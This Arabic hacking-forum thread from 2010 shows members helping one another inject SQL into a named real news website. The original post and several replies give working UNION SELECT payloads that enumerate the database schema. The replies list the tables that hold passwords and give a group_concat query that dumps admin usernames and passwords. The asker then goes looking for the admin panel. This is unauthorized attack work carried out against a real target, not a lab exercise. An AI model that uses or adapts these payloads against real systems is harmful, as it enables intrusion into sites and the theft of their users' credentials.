التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-06-2010, 11:25 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو







مستر نوبا غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مستر نوبا is on a distinguished road

افتراضي غير مجاب: مشكلتي الاولى في حقن SQL مشكلة Database error من فضلكم ادخلوا


السلام عليكم

انا حصلت موقع مصاب وحقنته بس اثناء الحقن واجهتني مشكله مادري وش هي يطلع لي Database error

ياليت تشوفونها لي هدفي مو اخترق الموقع واعلق الاندكس ابي بس اعرف حل هالمشكله

للمستقبل وللاختراقات القادمة ان شاء الله


الى هنا الحقنه شغاله

طبعا العمود المصاب تحصلونه جنب عنوان الموقع


كود:
http://www.alghadnews.com/show.php?id=-2059 UNION SELECT 1,2,3,concat(table_name,0x3a,column_name,0x3a,table_schema),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 +from+information_schema.columns+where+table_name=0x736974657573657273--

وهنا بعد مابغيت اطلع اليوزر والباس ظهرت المشكله Database error

كود:
http://www.alghadnews.com/show.php?id=-2059 UNION SELECT 1,2,3,ConCaT(id,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 +from+siteusers--

انتظركم


Vspan style="font-weight: bold; color: #ff0000;"Cydv l[hf:VLspanC la;gjd hgh,gn td prk SQL la;gm Database error lk tqg;l h]og,h

   

رد مع اقتباس
قديم 09-06-2010, 01:19 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road

افتراضي


اها اخي مشكلتك بسيطة جدا جدا
المشكلة انك وضعت بالحقنة

ConCaT(id,0x3a,pass)

اولا قلي كيف كنت حتجيب اليوزر بهالحقنة !
هذه الحقنة لا تظهر لك سوى الـ id فقط اذا حذفت الباس منها
ليش ؟
انتبه منيح على كلمة pass
انا استخرجت العواميد بهذه الحقنة وكان اسم عمود الباس هكذا
PASSWORD مش pass
الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--

انتبه جيدا اخي فالمعلومات التي ستضعها بالحقنة تكون مأخوذة من الحقنة السابقة
طيب نتابع

انا تابعت بهذا الجدول ويبدو انه لا يحوي على شيء انظر
الحقنة
http://www.alghadnews.com/show.php?i...om+siteusers--

طيب شو رايك نعود للأول عند الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--

ونضيف عليها group_ هكذا
الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--



الان تظهر لنا جميع الجداول التي تحتوي على كلمة %pass% مشفرة
وهي

siteusers:PASSWORD:alghad_news
sms:password:alghad_news
testnewsletter:pass:alghad_news
users:password:alghad_news


نحنا جربنا على الاول طب الان منجرب على غيره لحد ما نوصل للمطلوب
نصيحة اخي عندما تكون باول مرحلة وهي للبحث عن الجداول التي تحوي كلمة باس مشفرة
ضع group في الحقنة
حتى لا تضيع وقت بحقن جدول غير مطلوب

ان شاء الله اكون قد وفقت في الشرح

التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

رد مع اقتباس
قديم 09-06-2010, 03:55 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة عبد الله ر
اها اخي مشكلتك بسيطة جدا جدا
المشكلة انك وضعت بالحقنة

ConCaT(id,0x3a,pass)

اولا قلي كيف كنت حتجيب اليوزر بهالحقنة !
هذه الحقنة لا تظهر لك سوى الـ id فقط اذا حذفت الباس منها
ليش ؟
انتبه منيح على كلمة pass
انا استخرجت العواميد بهذه الحقنة وكان اسم عمود الباس هكذا
PASSWORD مش pass
الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--

انتبه جيدا اخي فالمعلومات التي ستضعها بالحقنة تكون مأخوذة من الحقنة السابقة
طيب نتابع

انا تابعت بهذا الجدول ويبدو انه لا يحوي على شيء انظر
الحقنة
http://www.alghadnews.com/show.php?i...om+siteusers--

طيب شو رايك نعود للأول عند الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--

ونضيف عليها group_ هكذا
الحقنة
http://www.alghadnews.com/show.php?i...115,%2037%29--



الان تظهر لنا جميع الجداول التي تحتوي على كلمة %pass% مشفرة
وهي

siteusers:PASSWORD:alghad_news
sms:password:alghad_news
testnewsletter:pass:alghad_news
users:password:alghad_news


نحنا جربنا على الاول طب الان منجرب على غيره لحد ما نوصل للمطلوب
نصيحة اخي عندما تكون باول مرحلة وهي للبحث عن الجداول التي تحوي كلمة باس مشفرة
ضع group في الحقنة
حتى لا تضيع وقت بحقن جدول غير مطلوب

ان شاء الله اكون قد وفقت في الشرح


كفيت ووفيت
بارك الله فيك يا غالي
وبالتوفيق
تحياتي
التوقيع

^_^



 

   

رد مع اقتباس
قديم 09-06-2010, 04:14 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road

افتراضي


تسلم يا غالي
هذا واجبنا

التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

رد مع اقتباس
قديم 09-08-2010, 06:37 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو







مستر نوبا غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مستر نوبا is on a distinguished road

افتراضي


مشكووور

ماقصرت والله يجزاك خير على التوضيح الاكثر من رائع

   

رد مع اقتباس
قديم 09-15-2010, 10:48 PM   رقم المشاركة : 6 (permalink)
معلومات العضو
MazMaz

VBSPIDERS TEAM

 
الصورة الرمزية MazMaz
 

 

 
إحصائية العضو








MazMaz غير متواجد حالياً

إرسال رسالة عبر MSN إلى MazMaz

 

 

إحصائية الترشيح

عدد النقاط : 10
MazMaz is on a distinguished road

افتراضي


شكرا عالشرح و ما قصرتو يا شباب

التوقيع

Mazmaz
--------------

 

   

رد مع اقتباس
قديم 09-15-2010, 11:34 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
الصورة الرمزية Tn-Sn!PeR
 

 

 
إحصائية العضو








Tn-Sn!PeR غير متواجد حالياً

إرسال رسالة عبر MSN إلى Tn-Sn!PeR

 

 

إحصائية الترشيح

عدد النقاط : 11
Tn-Sn!PeR is on a distinguished road

افتراضي


هاهو يا غالي إسم الأدمين و الباس

http://www.alghadnews.com/show.php?i...2+from+users--

إستعملنا في الحقنة أمر

كود PHP:
UNION SELECT 1,2,3,group_concat(id,username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+users 
--

يعني مثل ما قال أخي عبد الله ر نعود إلى أول حقنة و نجد الآتي

siteusers:PASSWORD:alghad_news
sms:password:alghad_news
testnewsletter:pass:alghad_news
users:password:alghad_news

الملون بالأحمر هو الذي إستعملته

أرجو أن تكون قد إستوعبت و إن تستحق شيء فلا تتردد

يلّا سلام

   

رد مع اقتباس
قديم 09-16-2010, 12:35 AM   رقم المشاركة : 8 (permalink)
معلومات العضو
 
إحصائية العضو







مستر نوبا غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
مستر نوبا is on a distinguished road

افتراضي


تسلم والله

بس اللوحة ماحصلتها

التوقيع

http://www2.0zz0.com/2010/09/19/16/123866997.jpg

لتواصل

Mr.NoBa@vip.cn

اتمنى من الادارة تغيير اسمي من مستر نوبا الى Mr.NoBa

سوف يقل دخولي الى المنتدى بسبب الدراسة
وتعلم html + php

قادم اليكم بقووهـ

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
مشكلتي في البوازون...بليز ادخلوا Lyl paris جـــ'ابات العناكــ'ب 7 07-18-2010 09:10 PM
[شرح] : حل مشكله Database error عند تركيب الماسي الخامس xman2 قســم تطويــر المــــواقع 0 06-09-2009 11:50 AM
حل مشكلة error on page support قســم تطويــر المــــواقع 0 05-26-2009 06:23 PM
[شرح] : حل مشكلة error on page support قســم تطويــر المــــواقع 0 05-26-2009 04:41 PM
postbit_legacy تطوير الشتري + حل مشكلة Database Error السابقة للاعضاء المحذوفين xman2 قســم تطويــر المــــواقع 0 04-14-2009 12:20 AM


الساعة الآن 05:44 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0